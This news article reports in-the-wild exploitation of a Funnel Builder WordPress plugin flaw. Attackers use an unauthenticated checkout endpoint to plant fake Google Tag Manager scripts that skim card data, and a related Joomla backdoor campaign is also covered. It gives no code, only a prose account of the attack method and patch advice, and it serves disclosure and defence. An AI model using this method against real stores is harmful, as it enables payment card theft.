A critical security vulnerability within the **Funnel Builder** WordPress plugin is currently being exploited in the wild to inject malicious JavaScript code into WooCommerce checkout pages. The attackers’ objective is to steal sensitive payment data from unsuspecting customers. The flaw affects all versions of the plugin prior to 3.15.0.3 and impacts over 40,000 WooCommerce stores globally.
Sansec, a Dutch e-commerce security company, detailed the ongoing exploitation this week. The vulnerability, which currently lacks an official CVE identifier, allows unauthenticated attackers to inject arbitrary JavaScript into every checkout page on a compromised store. FunnelKit, the developer of Funnel Builder, has released version 3.15.0.3 with a patch to address this critical security risk.
Funnel Builder Vulnerability Exploited for Payment Data Theft
The attackers are strategically inserting fake Google Tag Manager scripts into the plugin’s “External Scripts” setting. According to Sansec, this injected code closely resembles legitimate analytics tags but secretly loads a payment skimmer. This skimmer is designed to capture crucial information such as credit card numbers, CVVs, and billing addresses entered by customers during the checkout process.
Sansec’s analysis indicates that Funnel Builder contains a publicly accessible checkout endpoint. This endpoint, in older versions, allowed incoming requests to dictate which internal methods to execute without adequately verifying the caller’s permissions or restricting the available methods. This oversight creates a significant security loophole.
Bad actors can exploit this flaw by sending an unauthenticated request to invoke an unspecified internal method. This allows them to write attacker-controlled data directly into the plugin’s global settings. Consequently, the malicious code snippet gets embedded into every checkout page managed by Funnel Builder on the affected website.
The outcome of such an attack is the potential for malicious script tags to be executed with every checkout transaction on a vulnerable WordPress site. In observed incidents, the injected payload has been disguised as a Google Tag Manager loader. This loader fetches JavaScript from a remote domain, establishing a WebSocket connection to an attacker-controlled command-and-control (C2) server.
The primary objective of this malicious operation is to exfiltrate payment card details, CVV codes, and personal billing information provided by customers. Website owners are strongly advised to update their Funnel Builder plugin to the latest version, 3.15.0.3, immediately. Additionally, they should meticulously review the “Settings > Checkout > External Scripts” section for any unfamiliar entries and remove them without delay.
Sansec noted that presenting skimmers as familiar tracking tags like Google Analytics or Tag Manager is a recurring tactic seen in Magecart-style attacks. This approach is effective because administrators often overlook these legitimate-looking scripts, allowing the malicious code to remain undetected.
Broader Context of Web Application Exploitation
This disclosure follows recent reports from Sucuri highlighting a campaign targeting Joomla websites. In that instance, attackers were injecting heavily obfuscated PHP code to create backdoors, enabling communication with attacker-controlled C2 servers. The compromised sites were then used to serve spammy content to visitors and search engines, leveraging the website’s reputation for malicious purposes.
“The script acts as a remote loader,” security researcher Puja Srivastava stated in relation to the Joomla compromise. “It contacts an external server, sends information about the infected website, and waits for instructions. The response from the remote server determines what content the infected site should serve.” This method allows attackers to dynamically alter the compromised website’s behavior without needing to modify local files repeatedly, enabling them to inject spam links, redirect visitors, or display malicious pages on demand.
The ongoing exploitation of the Funnel Builder plugin underscores the persistent threat landscape for e-commerce platforms. Website owners must remain vigilant, implement robust security practices, and ensure all plugins and themes are kept up-to-date to mitigate such risks. Further monitoring by security firms will likely focus on identifying any new variations of this attack or other vulnerabilities that may emerge within popular WordPress plugins.